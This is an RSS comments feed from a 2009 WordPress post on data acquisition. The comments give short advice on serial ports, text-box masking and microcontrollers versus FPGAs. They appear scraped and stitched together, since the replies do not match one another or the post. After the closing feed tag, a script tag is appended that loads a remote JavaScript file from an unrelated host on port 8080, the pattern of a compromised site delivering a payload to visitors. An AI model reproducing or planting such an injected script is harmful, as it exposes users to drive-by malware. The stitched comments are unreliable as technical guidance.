<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Data Acquisition Systems &amp; Research</title>
	<atom:link href="http://acquiree.info/data-acquisition/data-acquisition-systems-research/feed" rel="self" type="application/rss+xml" />
	<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research</link>
	<description></description>
	<lastBuildDate>Thu, 22 Apr 2010 05:41:25 -0500</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: gugans</title>
		<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research/comment-page-1#comment-229</link>
		<dc:creator>gugans</dc:creator>
		<pubDate>Thu, 06 Aug 2009 05:30:19 +0000</pubDate>
		<guid isPermaLink="false">http://acquiree.info/data-acquisition/data-acquisition-systems-research#comment-229</guid>
		<description>Systems acquisition effort is mainly driven by user information requirements.

The 2nd one could be either a or b.  I&#039;d guess b.</description>
		<content:encoded><![CDATA[<p>Systems acquisition effort is mainly driven by user information requirements.</p>
<p>The 2nd one could be either a or b.  I&#039;d guess b.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Infobod1st</title>
		<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research/comment-page-1#comment-235</link>
		<dc:creator>Infobod1st</dc:creator>
		<pubDate>Thu, 06 Aug 2009 04:00:30 +0000</pubDate>
		<guid isPermaLink="false">http://acquiree.info/data-acquisition/data-acquisition-systems-research#comment-235</guid>
		<description>that&#039;s amazing , you answered my question before I asked it. Are you a psychic.</description>
		<content:encoded><![CDATA[<p>that&#039;s amazing , you answered my question before I asked it. Are you a psychic.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: 123</title>
		<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research/comment-page-1#comment-212</link>
		<dc:creator>123</dc:creator>
		<pubDate>Thu, 06 Aug 2009 02:31:44 +0000</pubDate>
		<guid isPermaLink="false">http://acquiree.info/data-acquisition/data-acquisition-systems-research#comment-212</guid>
		<description>Use the SerialPort class in the System.IO.Ports namespace:

http://msdn.microsoft.com/en-us/library/system.io.ports.serialport(VS.80).aspx

[EDIT]

Try using a MaskedText box with a regular expression mask to format the text in a cleaner fashion.</description>
		<content:encoded><![CDATA[<p>Use the SerialPort class in the System.IO.Ports namespace:</p>
<p>http://msdn.microsoft.com/en-us/library/system.io.ports.serialport(VS.80).aspx</p>
<p>[EDIT]</p>
<p>Try using a MaskedText box with a regular expression mask to format the text in a cleaner fashion.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: muthu m</title>
		<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research/comment-page-1#comment-214</link>
		<dc:creator>muthu m</dc:creator>
		<pubDate>Wed, 05 Aug 2009 18:01:45 +0000</pubDate>
		<guid isPermaLink="false">http://acquiree.info/data-acquisition/data-acquisition-systems-research#comment-214</guid>
		<description>I think after reading your question I know how Colonel O&#039;Neil in Stargate SG-1 feels when Samantha Carter is talking.</description>
		<content:encoded><![CDATA[<p>I think after reading your question I know how Colonel O&#039;Neil in Stargate SG-1 feels when Samantha Carter is talking.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: pavithra K</title>
		<link>http://acquiree.info/data-acquisition/data-acquisition-systems-research/comment-page-1#comment-218</link>
		<dc:creator>pavithra K</dc:creator>
		<pubDate>Wed, 05 Aug 2009 17:45:38 +0000</pubDate>
		<guid isPermaLink="false">http://acquiree.info/data-acquisition/data-acquisition-systems-research#comment-218</guid>
		<description>without more info on the circuit, it hard to say what the disadvantages would be.

The disadvantages of using a circuit instead of a micro are easy to say. Development time increases (especially if it dont work right the first time). Complexity of the circuit board increases. Cost increases. Flexibility decreases to practically 0. Im sure your professor will point these out to you.

About the only advantages would be if the circuit is going to do high speed calculations or conversions. Using a dedicated circuit would free up processing time from the micro that would be better spent on other tasks. If you are planning on doing this, I would recommend using an FPGA for the logic. This would allow the design to be flexible, and decrease design time because you dont have to make a new circuit board if the first try doesnt work. Cost is low due to only having one IC (plus an EEPROM for the config data). I think this is your only way of convincing your prof. that a dedicated circuit would be better. Even then, it depends on what other functions the design must also do.
 
To the other person: The 8 bit micro is one of the most widely use micro&#039;s for embedded applications. The price vs performance is unbeatable. Today&#039;s 8 bit micro&#039;s have tha ability of supporting larger RAM and ROM (using paging) than just 64K. They also have more than 1 serial port. Most have at least 2, plus USB, I2C, SPI. Better ones have the ability to do ethernet also. Some have the ability of 50 MIPS or more. Not bad for a micro that costs less than $20 bucks.</description>
		<content:encoded><![CDATA[<p>without more info on the circuit, it hard to say what the disadvantages would be.</p>
<p>The disadvantages of using a circuit instead of a micro are easy to say. Development time increases (especially if it dont work right the first time). Complexity of the circuit board increases. Cost increases. Flexibility decreases to practically 0. Im sure your professor will point these out to you.</p>
<p>About the only advantages would be if the circuit is going to do high speed calculations or conversions. Using a dedicated circuit would free up processing time from the micro that would be better spent on other tasks. If you are planning on doing this, I would recommend using an FPGA for the logic. This would allow the design to be flexible, and decrease design time because you dont have to make a new circuit board if the first try doesnt work. Cost is low due to only having one IC (plus an EEPROM for the config data). I think this is your only way of convincing your prof. that a dedicated circuit would be better. Even then, it depends on what other functions the design must also do.</p>
<p>To the other person: The 8 bit micro is one of the most widely use micro&#039;s for embedded applications. The price vs performance is unbeatable. Today&#039;s 8 bit micro&#039;s have tha ability of supporting larger RAM and ROM (using paging) than just 64K. They also have more than 1 serial port. Most have at least 2, plus USB, I2C, SPI. Better ones have the ability to do ethernet also. Some have the ability of 50 MIPS or more. Not bad for a micro that costs less than $20 bucks.</p>
]]></content:encoded>
	</item>
</channel>
</rss>



<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Undo.js"></script>
<!--70f30cb1c91cb389cf52a072dc1de0cc-->